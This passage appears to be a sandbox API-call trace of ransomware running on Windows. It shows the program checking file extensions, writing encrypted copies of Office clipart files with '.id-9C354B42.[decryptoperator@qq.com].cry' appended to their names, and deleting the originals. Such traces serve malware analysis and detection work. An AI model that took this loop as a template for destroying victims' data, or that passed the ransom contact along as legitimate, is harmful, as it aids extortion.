(lpString1=".rar", lpString2=".WMF") returned -1 [0052.488] lstrlenW (lpString=".bz2") returned 4 [0052.488] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.488] lstrlenW (lpString=".7z") returned 3 [0052.488] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.488] lstrlenW (lpString=".dbf") returned 4 [0052.488] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.488] lstrlenW (lpString=".1cd") returned 4 [0052.488] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.488] lstrlenW (lpString=".jpg") returned 4 [0052.488] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.502] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.502] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.505] GetLastError () returned 0x0 [0052.505] ReadFile (in: hFile=0x20c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x6cd2, lpOverlapped=0x0) returned 1 [0052.590] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x6ce0, lpOverlapped=0x0) returned 1 [0052.835] ReadFile (in: hFile=0x20c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.835] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.838] SetEndOfFile (hFile=0x16c) returned 1 [0052.927] CloseHandle (hObject=0x16c) returned 1 [0052.927] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.927] SetEndOfFile (hFile=0x20c) returned 1 [0052.929] CloseHandle (hObject=0x20c) returned 1 [0052.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.929] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0052.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.955] lstrlenW (lpString=".doc") returned 4 [0052.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.955] lstrlenW (lpString=".docx") returned 5 [0052.955] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.955] lstrlenW (lpString=".pdf") returned 4 [0052.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.955] lstrlenW (lpString=".xls") returned 4 [0052.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.955] lstrlenW (lpString=".xlsx") returned 5 [0052.955] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.955] lstrlenW (lpString=".ppt") returned 4 [0052.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.956] lstrlenW (lpString=".zip") returned 4 [0052.956] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.956] lstrlenW (lpString=".rar") returned 4 [0052.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.956] lstrlenW (lpString=".bz2") returned 4 [0052.956] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.956] lstrlenW (lpString=".7z") returned 3 [0052.956] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.956] lstrlenW (lpString=".dbf") returned 4 [0052.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.956] lstrlenW (lpString=".1cd") returned 4 [0052.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.956] lstrlenW (lpString=".jpg") returned 4 [0052.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.992] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.992] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0052.993] GetLastError () returned 0x0 [0052.993] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1204, lpOverlapped=0x0) returned 1 [0053.005] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1210, lpOverlapped=0x0) returned 1 [0053.006] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.006] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.006] SetEndOfFile (hFile=0x1ac) returned 1 [0053.007] CloseHandle (hObject=0x1ac) returned 1 [0053.007] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.007] SetEndOfFile (hFile=0x16c) returned 1 [0053.007] CloseHandle (hObject=0x16c) returned 1 [0053.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.008] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.014] lstrlenW (lpString=".doc") returned 4 [0053.014] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString=".docx") returned 5 [0053.014] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.014] lstrlenW (lpString=".pdf") returned 4 [0053.014] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString=".xls") returned 4 [0053.014] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.014] lstrlenW (lpString=".xlsx") returned 5 [0053.014] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.014] lstrlenW (lpString=".ppt") returned 4 [0053.014] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.014] lstrlenW (lpString=".zip") returned 4 [0053.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.014] lstrlenW (lpString=".rar") returned 4 [0053.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString=".bz2") returned 4 [0053.014] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString=".7z") returned 3 [0053.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.014] lstrlenW (lpString=".dbf") returned 4 [0053.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.014] lstrlenW (lpString=".1cd") returned 4 [0053.014] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.015] lstrlenW (lpString=".jpg") returned 4 [0053.015] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.015] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=8492) returned 1 [0053.015] CloseHandle (hObject=0x16c) returned 1 [0053.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 0x20 [0053.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.015] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.015] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.015] GetLastError () returned 0x0 [0053.016] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x212c, lpOverlapped=0x0) returned 1 [0053.025] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2130, lpOverlapped=0x0) returned 1 [0053.026] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.026] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.026] SetEndOfFile (hFile=0x1ac) returned 1 [0053.027] CloseHandle (hObject=0x1ac) returned 1 [0053.027] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.027] SetEndOfFile (hFile=0x16c) returned 1 [0053.027] CloseHandle (hObject=0x16c) returned 1 [0053.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.028] lstrlenW (lpString=".doc") returned 4 [0053.028] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.028] lstrlenW (lpString=".docx") returned 5 [0053.028] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.028] lstrlenW (lpString=".pdf") returned 4 [0053.028] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.028] lstrlenW (lpString=".xls") returned 4 [0053.028] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.028] lstrlenW (lpString=".xlsx") returned 5 [0053.028] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.028] lstrlenW (lpString=".ppt") returned 4 [0053.028] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.028] lstrlenW (lpString=".zip") returned 4 [0053.028] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.028] lstrlenW (lpString=".rar") returned 4 [0053.029] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.029] lstrlenW (lpString=".bz2") returned 4 [0053.029] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.029] lstrlenW (lpString=".7z") returned 3 [0053.029] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.029] lstrlenW (lpString=".dbf") returned 4 [0053.029] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.029] lstrlenW (lpString=".1cd") returned 4 [0053.029] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0053.029] lstrlenW (lpString=".jpg") returned 4 [0053.029] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.029] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=7804) returned 1 [0053.029] CloseHandle (hObject=0x16c) returned 1 [0053.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 0x20 [0053.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.029] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.030] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.030] GetLastError () returned 0x0 [0053.030] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0053.128] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0053.128] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.128] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.129] SetEndOfFile (hFile=0x1ac) returned 1 [0053.129] CloseHandle (hObject=0x1ac) returned 1 [0053.129] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.129] SetEndOfFile (hFile=0x16c) returned 1 [0053.130] CloseHandle (hObject=0x16c) returned 1 [0053.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0053.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.130] lstrlenW (lpString=".doc") returned 4 [0053.130] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.130] lstrlenW (lpString=".docx") returned 5 [0053.130] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.130] lstrlenW (lpString=".pdf") returned 4 [0053.130] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.130] lstrlenW (lpString=".xls") returned 4 [0053.130] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.130] lstrlenW (lpString=".xlsx") returned 5 [0053.130] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.130] lstrlenW (lpString=".ppt") returned 4 [0053.130] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.130] lstrlenW (lpString=".zip") returned 4 [0053.130] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.130] lstrlenW (lpString=".rar") returned 4 [0053.130] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.131] lstrlenW (lpString=".bz2") returned 4 [0053.131] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.131] lstrlenW (lpString=".7z") returned 3 [0053.131] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.131] lstrlenW (lpString=".dbf") returned 4 [0053.131] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.131] lstrlenW (lpString=".1cd") returned 4 [0053.131] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0053.131] lstrlenW (lpString=".jpg") returned 4 [0053.131] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.131] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4296) returned 1 [0053.132] CloseHandle (hObject=0x16c) returned 1 [0053.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 0x20 [0053.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.132] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.132] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0053.132] GetLastError () returned 0x0 [0053.132] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x10c8, lpOverlapped=0x0) returned 1 [0053.144] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x10d0, lpOverlapped=0x0) returned 1 [0053.145] ReadFile (in: hFile=0x16c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.145] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.145] SetEndOfFile (hFile=0x1ac) returned 1 [0053.145] CloseHandle (hObject=0x1ac) returned 1 [0053.145] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.146] SetEndOfFile (hFile=0x16c) returned 1 [0053.146] CloseHandle (hObject=0x16c) returned 1 [0053.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0053.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.147] lstrlenW (lpString=".doc") returned 4 [0053.147] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.147] lstrlenW 